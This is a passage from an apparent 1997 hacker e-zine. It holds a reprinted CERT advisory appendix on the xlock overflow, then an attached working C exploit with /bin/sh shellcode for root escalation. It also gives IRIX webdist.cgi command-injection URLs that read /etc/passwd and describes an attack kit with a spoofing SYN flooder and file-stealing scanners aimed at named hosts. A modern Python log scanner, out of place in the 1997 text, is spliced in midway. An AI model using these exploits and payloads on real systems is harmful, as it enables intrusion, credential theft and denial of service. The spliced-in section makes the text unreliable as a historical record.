...........................................................................

Appendix A - Vendor Information

Below is a list of the vendors who have provided information for this
advisory. We will update this appendix as we receive additional information.
If you do not see your vendor's name, the CERT/CC did not hear from that
vendor. Please contact the vendor directly.

Berkeley Software Design, Inc. (BSDI)
=====================================
  BSD/OS is not vulnerable to the problem in xlock since our xlock is not
  setuid.

Cray Research - A Silicon Graphics Company
==========================================
  Cray Research does not include xlock in its X Window releases, so we are
  not at risk on the xlock buffer overflow problem.

Data General Corporation
========================
  The xlock sources (xlockmore-3.7) that DG includes in its contributed
  software package have been modified to remove this vulnerability. These
  will be available when release 8 comes out. We also recommend that our
  customers who have the current version should change the sprintf calls in
  resource.c to snprintf calls, rebuild and reinstall the package.

Digital Equipment Corporation
=============================
  This reported problem is not present for Digital's ULTRIX or Digital UNIX
  Operating Systems Software.

FreeBSD, Inc.
=============
  The xlockmore version we ship in our ports collection is vulnerable in all
  shipped releases. The port in FreeBSD-current is fixed. Solution is to
  install the latest xlockmore version (4.02).

Hewlett-Packard Company
=======================
  We ship a suid root program vuelock that is based on xlock. It does have
  the vulnerability. The only workaround is to remove the executable; the
  patch is "in process".

IBM Corporation
===============
  AIX is vulnerable to the conditions described in this advisory. The
  following APARs will be released soon:

     AIX 3.2:  APAR IX68189
     AIX 4.1:  APAR IX68190
     AIX 4.2:  APAR IX68191

  IBM and AIX are registered trademarks of International Business Machines
  Corporation.
LINUX
=====
  Red Hat:  Not vulnerable
  Caldera:  Not vulnerable
  Debian:   An updated package is on the Debian site
  SuSE:     ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/S.u.S.E.-4.4.1/xap1/xlock

  And in general the new Xlockmore release fixes the problems.

NEC Corporation
===============
  UX/4800             Not vulnerable for all versions.
  EWS-UX/V(Rel4.2MP)  Not vulnerable for all versions.
  EWS-UX/V(Rel4.2)    Not vulnerable for all versions.
  UP-UX/V(Rel4.2MP)   Not vulnerable for all versions.

The Open Group
==============
  Publicly available software that was formerly distributed by the X
  Consortium - Not vulnerable.

Solbourne
=========
  Solbourne is not vulnerable to this attack.

Sun Microsystems, Inc.
======================
  We are producing patches for OpenWindows 3.0 for Sun OS versions 4.1.3_U1,
  4.1.4, 5.3, 5.4, 5.5, and 5.5.1.

-------------------------------------------------------------------------------
The CERT Coordination Center thanks David Hedley for reporting the original
problem and Kaleb Keithley at The Open Group for his support in the
development of this advisory.
-------------------------------------------------------------------------------

If you believe that your system has been compromised, contact the CERT
Coordination Center or your representative in the Forum of Incident Response
and Security Teams (see http://www.first.org/team-info/).

CERT/CC Contact Information
------------------------------
Email    cert@cert.org

Phone    +1 412-268-7090 (24-hour hotline)
         CERT personnel answer 8:30-5:00 p.m. EST(GMT-5) / EDT(GMT-4)
         and are on call for emergencies during other hours.

Fax      +1 412-268-6989

Postal address
         CERT Coordination Center
         Software Engineering Institute
         Carnegie Mellon University
         Pittsburgh PA 15213-3890
         USA

Using encryption
   We strongly urge you to encrypt sensitive information sent by email. We can
   support a shared DES key or PGP. Contact the CERT/CC for more information.
   Location of CERT PGP key
      ftp://info.cert.org/pub/CERT_PGP.key

Getting security information
   CERT publications and other security information are available from
        http://www.cert.org/
        ftp://info.cert.org/pub/

   CERT advisories and bulletins are also posted on the USENET newsgroup
        comp.security.announce

   To be added to our mailing list for advisories and bulletins, send
   email to
        cert-advisory-request@cert.org
   In the subject line, type
        SUBSCRIBE  your-email-address
-------------------------------------------------------------------------------

* Registered U.S. Patent and Trademark Office.

Copyright 1997 Carnegie Mellon University
This material may be reproduced and distributed without permission provided it
is used for noncommercial purposes and the copyright statement is included.

The CERT Coordination Center is part of the Software Engineering Institute
(SEI). The SEI is sponsored by the U.S. Department of Defense.
-------------------------------------------------------------------------------

This file: ftp://info.cert.org/pub/cert_advisories/CA-97.13.xlock
           http://www.cert.org
                click on "CERT Advisories"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Revision history

------------------------------------------------------------------------------
The Exploit Code - not in the *ORIGINAL* CERT advisory ;] :
------------------------------------------------------------------------------

/*
 * x86 XLOCK overflow exploit by cesaro@0wned.org 4/17/97
 *
 * Original exploit framework - lpr exploit
 *
 * Usage:  make xlock-exploit
 *         xlock-exploit
 *
 * Assumptions: xlock is suid root, and installed in /usr/X11/bin
 */

/* The three header names were lost when the zine was transcribed; these are
   the ones the calls below need. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET  50
#define BUFFER_SIZE     996
long get_esp(void) { __asm__("movl %esp,%eax\n"); } int main(int argc, char *argv[]) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int dfltOFFSET = DEFAULT_OFFSET; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; int i; if (argc > 1) dfltOFFSET = atoi(argv[1]); else printf("You can specify another offset as a parameter if you need...\n"); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + dfltOFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 8. IRiX WWW Server Bugs : Tetsu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Number 1 : ---------- http://www.site.com/cgi-bin/wrap?/etc ...Lets you view the contents of the /etc/ directory, you can try others too.. Number 2 : ---------- http://www.site.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd ...Lets you view the /etc/passwd file, also try /etc/hosts to make sure the cgi script isn't a trap. You can also execute some kind of remote shell using webdist technique, but we are looking into it now... ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 9. Hacking Not-So-Electrical Items : Tetsu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ y0h CrEw!@# T0daY wE WiLL LeArN tEw Hax0r.... TrEES!!! tReEs!!! TrEEs!!! TrEES!!! tReEs!!! TrEEs!!! TrEES!!! tReEs!!! TrEEs!!! YePpO! TrEEs! LiKe Da oNeZ j00 FiNd In YeR GaRdEn SoMeTiMeS!! 
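An added defender-side example for the IRiX WWW server bugs in section 8 above (not code from the zine): a small Python scanner that flags the two request shapes in Common Log Format access logs, wrap called with an absolute path and webdist.cgi called with a shell metacharacter in distloc, including URL-encoded variants. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not from the zine.
SAMPLE_LOG = """\
10.0.0.5 - - [26/May/1997:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 1024
10.0.0.7 - - [26/May/1997:10:02:15 +0000] "GET /cgi-bin/wrap?/etc HTTP/1.0" 200 512
10.0.0.9 - - [26/May/1997:10:03:44 +0000] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 200 2048
10.0.0.9 - - [26/May/1997:10:04:01 +0000] "GET /cgi-bin/webdist.cgi?distloc=%3Bcat%20/etc/hosts HTTP/1.0" 404 300
10.0.0.11 - - [26/May/1997:10:05:10 +0000] "GET /cgi-bin/webdist.cgi?distloc=sgi_demos HTTP/1.0" 200 128
"""

# Client IP, timestamp, method and request target of a CLF line.
CLF_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)')

# Characters that let a parameter value break out of the command webdist.cgi builds.
SHELL_META_RE = re.compile(r'[;|&`$\n]')


def classify(target):
    """Return a finding label for one request target, or None if it looks benign."""
    path, _, query = target.partition('?')
    query = unquote(query)          # catch %3B and %2F as well as literal ';' and '/'
    if path.endswith('/cgi-bin/wrap') and query.startswith('/'):
        return 'wrap: absolute path handed to directory-listing CGI'
    if path.endswith('/cgi-bin/webdist.cgi') and 'distloc=' in query \
            and SHELL_META_RE.search(query):
        return 'webdist.cgi: shell metacharacter in distloc parameter'
    return None


def scan_log(text):
    """Scan CLF text; return (ip, timestamp, target, label) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue                # not a CLF request line
        label = classify(m['target'])
        if label:
            findings.append((m['ip'], m['ts'], m['target'], label))
    return findings


if __name__ == '__main__':
    for ip, ts, target, label in scan_log(SAMPLE_LOG):
        print(f'{ts} {ip} {label}: {target}')
```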
oKaY, HeRe aRe THe k-LEeTo JuaReZ YeW wILL nEEd...

1 : A HaCk SaW
2 : CoMoFlAgUeD CLoThiNG
3 : a CoPPeR NaiL
4 : A hAmmER
5 : a GI-JoE AcTiOn FiGuRe (WiTH pArAChUte)
6 : a SmALL, wELL TrAiNeD InSecT, LiKe A bEE
7 : oNe LaPtOp ComPUtEr (wIv d0S 2.4 *OnLy*)
8 : OnE RS232 CaBlE

OkAy CrEw! ThIs iS Da mAsTA PlAn!@#

FiRsTly, aS WiTH mANy OtHer HaCks YoU WiLL nEEd tO ScAn Da PoRts Of ThE TrEE,
dO ThIs By UsIng tHE SmALL, wELL TrAiNeD InSecT, LiKe A bEE, aS bEE's aRe ThE
BeSt At SCannInG HiDDen PoRtz, WhEn ThE bEE HaS fOuND sOmE kEwL PoRtS (UsuALLy
aT dA tOp oF Da TrEE) tIe ThE GI-JoE AcTiOn FiGuRe tO ThE bEE, aNd gEt HiM To
PuT YeR Rs232 CaBle Up ThErE sO YeW CaN AcCesS dA PoRt Of Da TrEE! WhEn ThE
rS232 cAbLE iS In pLACe, PuT oN ThE CaMofLAUgEd CloTHIng, AnD HiDe BeHiNd A
bUsH WiTh YoUr LaPtOP, ThEn GeT ThE GI-JoE AcTiOn FiGuRe To PaRAcHute d0Wn dA
TrEE, aNd GiVe YoU ThE OTheR EnD Of dA Rs232 CaBLe, ThEn gO InTo DoS AnD RuN
tHiS PrOgRam In Gw-BASiC...

10 OPEN (COM PORT AND STUFF)
20 DATA "GIVE ME ALL YOUR K-LEET JUAREZ AND STUFF NOW, BECAUSE I OWN J00"
30 OPEN (ANOTHER PORT AND STUFF)
40 DATA "EYE BE W00PIN J00 F00L, PHEAR MUH ELEETNESS"
50 GOTO 10

ThIs ShOuLd cRaSh ThE TrEE, LeAvInG iT OpEn tO AtTaCk, NeXt TaKE ThE HaCk SaW
AnD StArT cUtTiNg The BaRK oFF ThE TrEE (OnLy iN oNe pLaCe) ThE BArk AcTs LiKe
a FiRewALL, AnD sO It MuSt Be tAkeN DoWN FirSt. NeXt CHecK On YoUr LaPtOp
WheThEr ThE TrEE HaS GiVen yEw eLeeT JuArEz, iF NoT ThEN uSe The CoPPeR nAiL
to rm -rf / ThE TrEE, HaMmEr The CoPPeR nAiL InTo The TrEE, AnD ThE TrEE WiLL
bE rm'd WitHiN aBOUt A wEEk (dEw TeW 99999999999999 GB HaRd dRivE SPaCe)

hAvE PhUn! MoRe NoT-So-LeCtiCaL iTeMz NeXt TimE!@~^&*

TeEkAy.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Amnesty International Hacked : Article From cnet.com
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

http://www.news.com/News/Item/0,4,10135,00.html

Amnesty International hacked
By Janet Kornblum
April 28, 1997, 3:15 p.m. PT

Hackers broke into the Amnesty International home page over the weekend,
altering it with a highly stylized, futuristic-looking graphic of a small child
or baby smoking a cigarette.

Amnesty International didn't know what the perpetrators wanted to accomplish
with the hacking, which was strikingly apolitical considering the political
nature of the target.

Above the picture, the altered Web page read, "Who laughs last? We are the 4
man dream team, just proving one of many points."

But just what those points were was lost on many, not the least of whom was
Mike Blackstock, the system administrator for Ontario Internet Link, the small
Canadian Internet service provider that hosts the Amnesty site for free.

"As far as I can tell, they didn't do anything malicious," he said. "They
replaced one page of Amnesty with a silly graphic of a kid smoking. This was
not political as far as I could tell. The only politics I could think of was
cigarettes."

Beneath the picture, the page is signed, "Thanx to: so1o, modeX, XFli,
mstrhelix...CodeZero uber alles!"

This hack appears to be unrelated to other recent high-profile incidents,
including one last week in which a Portuguese group broke in to Indonesian
government Web pages to protest its treatment of East Timor. In that case, the
hackers--referred to by many as "crackers" because they crack into
systems--were quite clear about the reasons behind their action.
In the case of the Amnesty page, Blackstone said the hackers only altered the
Web page and did not cause major damage, though they could have done so if they
wanted to. The altered page was up for a few hours, he said.

Blackstone was busy plugging the security hole but pointed out that sites much
bigger with higher profiles, such as the Air Force, the Central Intelligence
Agency, and the Justice Department, also have been hacked.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. //sToRm// Of sIn Rips Port Pro : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Ummmm, on www.sinnerz.com //sToRm// has a lamefuck page with his k-leet
w1nd0ze '95 juarez, coded in Visual Basic, with his "VB For Dummies" book,
which include...

DrSpewfy : Pile'O'Crap, why not get a nameserver and sirc? and actually be
           able to talk to people?

DCCNewk  : Chargen Flood? why not try like, SYN FLOOD? d0h..

Port Pro : Okay, original Port Pro is SHAREWARE, made by Blue Byte Software,
           and it is SOOO obvious that //sToRm// just did a little bit of hex
           editing, and B00oo00m! he's changed the author's name and shit to
           his own! but ummm, because of his EXTREME lameness, he didn't know
           how to change the program name, the version and the general
           interface and look of the program, what a LAME FUCK. I'm sure he
           will have Blue Byte on his fucking ass with Copyright and shit.
           h0h0h0h0h0!@#

I doubt //sToRm// coded *ANYTHING* on that page, as DrSpewfy is just shit, and
DCCNewk is just like the DCC Nuking code we put out in the CodeZero Technical
Journal Issue 2 :)

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Digital Darkness Lives : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

It looked as if the DD wouldn't bring out a magazine this month, but they got
a huge influx of submissions and live another day!@# If you want to submit
anything for DD, mail spamman@erols.com or spaman@erols.com 'cos I ain't sure.

Visit their page too : http://dd.home.ml.org

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. /home/sdr 0wned : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

sdr, a user of duncan.nac.net (owned by bspline - where all the cool people on
efnet have their shells) was playing with the permissions in his home directory
and he accidentally made the whole directory world readable, so then cold blood
and others got all of sdr's k-leet y00nix juarez, and tar'd + gz'd them up and
were distributing the sdr.tar.gz in #hack using XDCC :)

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Sendmail 8.8.4 Remote Is Out : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Yep, it's been confirmed, the sendmail 884 remote exploit for ALL OS's is now
out. There was some delay in r00t members getting the offsets needed for each
Operating System, but now the technique is complete, and many 8.8.4 systems
are vulnerable. Sendmail 8.8.5 remote exploits are being looked into now.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. sIn inf0z Part 2 : The CodeZero
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

-------------------------------------------------------------------------------
=-= w0wie!@# we g0t 2 n0w!! =-=
-------------------------------------------------------------------------------
Alias : Evil Chick
-------------------------------------------------------------------------------
Alias : \\StOrM\\
-------------------------------------------------------------------------------

aS wE PrOMiSeD LasT t1me! eXpect m0re s00n!

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ so1o of The CodeZero presents. \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/          The CodeZero          \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/       Remote Attack Kit.       \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/             [CRAK]             \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/      .:. -=10/05/97=- .:.      \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

w00 w00!! Now you can have k-leet skills like me! Firstly upload the crak.tar
to a linux 2.0.x system, or to your own, then tar -xvf crak.tar to unzip the
file, then move the files around and shit if you want to, then you're ready to
go! Expect OS specific kits in later issues...And Multi-Scan s00n.
===============================================================================
The Contents Of The Kit :
===============================================================================

dnsscan    : Mass DNS query program, gets lists of systems in entire countries,
             or all the systems on a network, like *.microsoft.com.
phpscan    : Scans hosts from a file and outputs a list of php vulnerable sites.
phpget     : Gets files from php vulnerable servers.
phfscan    : Scans hosts from a file and outputs a list of phf vulnerable sites.
ident-scan : Scans all daemons running on ports and determines cool stuff.
tcpprobe   : Very simple portscanner.
fingah     : Uses an apache hole to finger systems if port 79 isn't open.
synk4      : SYN flooder, basically kicks the shit out of systems.

===============================================================================
Usages :
===============================================================================

Use this command to unzip the crak.tar...

% tar -xvf crak.tar

then it will be copied into /crak, depending on the working directory..

DNSscan :
---------

Usage: dnscan [-file ] [-domain ] [-sub ]

  -file       Uses the given file as a list of subdomains and servers to scan.
  -domain     Lists all servers in a first level domain like com or net.
  -subdomain  Lists all servers in a domain.

The -domain mode will first create a file called 'domain.' with a list of all
subdomains and their name servers, and then use that file in the -file mode.
The input file needs to have the following format:

  []

To list all servers in Japan, do "dnscan -domain jp"
To list all servers in the netcom domain, do "dnscan -sub netcom.com"

PHPscan :
---------

phpscan

eg. phpscan domains.txt phpvunerable.txt

PHPget :
--------

phpget

eg. phpget www.p1.com /etc/passwd

PHFscan :
---------

phfscan

eg. phfscan domains.txt phfvunerable.txt

Ident-Scan :
------------

ident-scan [low port] [high port]

eg. ident-scan warped.arc.nasa.gov 1 9999

TCPprobe :
----------

tcpprobe

eg. tcpprobe microsoft.com

Fingah :
--------

fingah

eg. fingah www.p1.com root

Synk4 :
-------

synk4

If you use 0 as the source address, it puts the syn flooder into random ip
mode, where the packets are sent from many different random sites.

eg. synk4 0 fucked.com 1 23

Have Phun!@#

===============================================================================
Where To Get CRAK.tar : Under CodeZero Linux Tools Section on www.codez.com
===============================================================================

It can be unzipped with WinZip if you are in W1nd0ze too.. :)

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Well, that was issue 2, hope y'all liked it, don't forget to visit...

AnD ReMeMBer To LiNk To iT FrOm YouR SiTeZ!!

=====================> http://www.codez.com NOW UP!@#* <=====================

Until next time, when there will be 900 days until the year 2000...

The CodeZero.

===============================================================================
=====================> http://www.codez.com NOW UP!@#* <=====================
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Remember, McDonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!!
Don't Believe The Lies!! PHEAR WENDY!@#*
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ